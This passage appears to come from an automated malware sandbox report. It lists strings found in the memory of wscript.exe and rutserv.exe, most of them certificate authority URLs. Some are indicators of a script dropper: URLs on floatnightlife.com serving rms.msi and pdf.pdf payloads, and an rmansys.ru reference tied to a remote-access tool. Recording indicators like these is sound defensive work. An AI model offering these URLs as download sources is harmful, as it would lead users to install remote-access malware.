          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2369369070.0000022F40513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2369369070.0000022F40513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
          Source: rutserv.exe, 00000028.00000000.2442175532.0000000000A51000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2369369070.0000022F40513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2369369070.0000022F40513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.flexerasoftware.com0
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
          Source: wscript.exe, 00000000.00000003.1585804294.0000021DE5F86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314408043.0000021DE3DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1586867272.0000021DE37AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1586360867.0000021DE33A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1313855689.0000021DE39B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1316546517.0000021DE4845000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314166350.0000021DE37A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2370423996.0000022F3B2D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2360364469.0000022F3B3CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1502469535.0000022F3D888000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1503136188.0000022F3D67F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1505608771.0000022F3E719000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1503558056.0000022F3DC8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1529268330.000001BD470C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://floatnightlife.com/pdf.pdf?sn=22
          Source: wscript.exe, 00000005.00000003.2370423996.0000022F3B2D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://floatnightlife.com/pdf.pdf?sn=22k
          Source: wscript.exe, 00000005.00000003.2370423996.0000022F3B2D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://floatnightlife.com/pdf.pdf?sn=22m
          Source: wscript.exe, 00000000.00000003.1585804294.0000021DE5F86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314408043.0000021DE3DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1586867272.0000021DE37AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1586360867.0000021DE33A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1313855689.0000021DE39B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314166350.0000021DE37A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1317223730.0000021DE47F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2370423996.0000022F3B2D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2360364469.0000022F3B3CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1517722890.0000022F3E715000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1502469535.0000022F3D888000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2361207406.0000022F3EE98000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1503136188.0000022F3D67F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1506693601.0000022F3E6C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1503558056.0000022F3DC8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1529268330.000001BD470C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1535643732.000001BD48728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://floatnightlife.com/rms.msi?sn=65
          Source: wscript.exe, 00000005.00000003.2369369070.0000022F40504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://floatnightlife.com/rms.msi?sn=65.
          Source: wscript.exe, 00000005.00000003.2370423996.0000022F3B2D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://floatnightlife.com/rms.msi?sn=65b
          Source: wscript.exe, 00000005.00000003.2370423996.0000022F3B2D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://floatnightlife.com:443/rms.msi?sn=65
          Source: wscript.exe, 00000007.00000003.1529268330.000001BD470C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1533345593.000001BD470E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
          Source: wscript.exe, 00000005.00000003.2344917700.0000022F40A2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367939979.0000022F4059C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rmansys.ru/IS_PREVENT_DOWNGRADE_EXITZ_DOWNGRADE_DETECTED;Z_UPGRADE_DETECTED;COMPANYNAME;INST
          Source: wscript.exe, 00000000.00000003.1585804294.0000021DE5F86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314408043.0000021DE3DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1586867272.0000021DE37AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1586360867.0000021DE33A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1313855689.0000021DE39B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314166350.0000021DE37A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1508070360.0000022F3E241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1502469535.0000022F3D888000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1503136188.0000022F3D67F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1503558056.0000022F3DC8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1529268330.000001BD470C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
          Source: wscript.exe, 00000000.00000003.1317708607.0000021DE436D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.com8
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2369369070.0000022F40513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
          Source: wscript.exe, 00000000.00000003.1585804294.0000021DE5F86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314408043.0000021DE3DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1586867272.0000021DE37AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1586360867.0000021DE33A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1313855689.0000021DE39B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314166350.0000021DE37A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1317336980.0000021DE46B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1507241071.0000022F3E58D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1502469535.0000022F3D888000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1503136188.0000022F3D67F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1503558056.0000022F3DC8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1529268330.000001BD470C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
          Source: wscript.exe, 00000000.00000003.1585804294.0000021DE5F86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314408043.0000021DE3DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1586867272.0000021DE37AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1317708607.0000021DE436D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1586360867.0000021DE33A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1313855689.0000021DE39B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314166350.0000021DE37A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1502469535.0000022F3D888000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1503136188.0000022F3D67F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1503558056.0000022F3DC8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1529268330.000001BD470C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com
          Source: wscript.exe, 00000005.00000003.1508070360.0000022F3E241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.comp
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
